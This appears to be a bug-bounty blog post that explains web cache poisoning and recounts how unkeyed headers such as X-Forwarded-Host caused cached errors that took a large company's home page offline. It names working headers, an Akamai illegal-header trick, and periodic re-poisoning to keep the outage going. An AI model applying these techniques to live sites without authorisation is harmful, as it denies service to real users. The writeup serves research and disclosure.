Today I’m going to talk about cache, denial of service, and a vulnerability I recently found in a very large company.
Hello hunters, let’s take a closer look at how cache poisoning works and how I was able to exploit this vulnerability to get a DOS on the home page of a large company.
A cache is an intermediate memory system used to temporarily store data in order to optimize rendering performance when browsing a website.
There are several caching systems:
You will surely have understood that the caching system that interests us here is the server side. If we assume that:
- the cache provides an identical response to users who have made a similar request
- cached responses are stored for a limited time
What happens if we cache a malicious version (save) of the site and this version is then served to users who visit the site after us?
Definition from PortSwigger: Web cache poisoning is an advanced technique whereby an attacker exploits the behavior of a web server and cache so that a harmful HTTP response is served to other users.
A successful web cache poisoning attack can lead to several types of attacks depending on the nature of the payload stored — in the cache — by the attacker: HTMLi, XSS, Open redirection, DOS..
In order to exploit the behavior of the cache as an attacker it is necessary to understand how it works. I said earlier: “the cache provides an identical response to users who made a similar request”, but how does the cache define that it is a similar request?
This is where “Cache Keys” come in : when the cache receives a request, it compares some of its components (request line, host, some headers, etc.) with the requests from the responses it has saved.
We can imagine that all of these components — called cache keys — form like a “fingerprint”, if this request “fingerprint” is found then the cache returns the corresponding response, otherwise — considering that it has not saved the corresponding response to the request — it forwards the request to the web server.
The components of the request that are not included in the key cache are called “unkeyed”, the cache does not take them into consideration during the comparison, which is very interesting for an attacker: if one of these unkeyed — any header — is reflected on the response in a dangerous way (HTMLi, XSS, DOS..), this will allow:
This will result in cache poisoning.
Cache keys vary and depend on the configuration of the cache in question, sometimes only the request line and host are included, and all other components of the request are unkeyed. It is therefore essential — as an attacker — to go through a phase of analysis and understanding of the target cache in order to identify the cache keys, the caching duration, etc.
I had the opportunity to exploit some cache-related vulnerabilities on different programs and I recently found — in fairly short time intervals — two cache poisoning leading to a DOS, one of which was on a very big company.
The first thing to do to identify this type of vulnerability is to analyze the server response:
Before going any further, I would quickly like to introduce an important concept to prevent some people from breaking sites in production.
Some request components are systematically included in the key cache, starting with the URL (except in specific cases):
-> If the cache stores the response from: https://www.example.com/
-> And a user requests: https://www.example.com/?test=test
Then the cache — when comparing the cache keys — will not find an identical version and will forward the request to the server (the URL/request line being part of the cache key).
And it is precisely this behavior that we will use as researchers in order to carry out tests without compromising the target; during our tests, we will always add a parameter to the target URL so that the cached version — potentially poisoned — is only accessible from the URL containing our unique parameter. We will avoid harming the users of the platform in question and can carry out our tests quietly.
Performing an attack via its cache buster is obviously sufficient — and mandatory — for a proof of concept when writing the report.
After analyzing the server response I know that a cache system is in place and I am aware of two headers as part of the cache key:
- “Accept-Encoding”
- “x-wf-forwarded-proto”
I start by doing small tests to find interesting headers being “unkeyed” (not part of the cache key) like “X-Forwarded-For”, “X-Host”, “X-Forwarded-Scheme” .. etc but nothing conclusive.
I won’t go into the details of the different search methods to find a “Cache Deception” vulnerability here, but maybe in a future article, it doesn’t say anything conclusive during my tests at this level either.
On the other hand, I know that the “X-Timer” header — present in the response — is often reflected if a value is specified in the request. This header is harmless for a classic HTMLi/XSS type attack because it is reflected in the headers but not the HTML code, so I tried to cause an error in the back-end hoping that the error is saved in the cache :
I open a second browser and then try to access the URL — containing my cache buster (?mycachebuster=zhero_):
DOS done! Making the main page completely inaccessible.
A few comments :
This time the “unkeyed key” that helped me was “X-Forwarded-Host”. Any value with this header caused a 404 error stored in the cache, making the main page of a large company completely inaccessible — of which you are surely the customers one way or another — :
Checking from another browser :
DOS success! 💉
You will surely have understood that the same attack is possible without the cache buster. Even if the caching is limited in terms of time (longer or shorter depending on the configuration), it is very easy for an attacker to make this attack “permanent” using a small script returning “poisoned” requests at regular time intervals based on caching duration.
If you find an unusable “unkeyed” header — in terms of XSS etc — consider DOS as a last resort : If you manage to cause an error in the back-end and cache the response then you have your vulnerability (provided of course that the DOS is done on an interesting page and not a CSS or other resource).
Little extra tip: I read on an article by researcher bombon (H1 username) that it was possible to cause an 400 error by adding an illegal header when it comes to Akamai CDN, ex:
\:
The caching of the error will then depend on the cache configuration.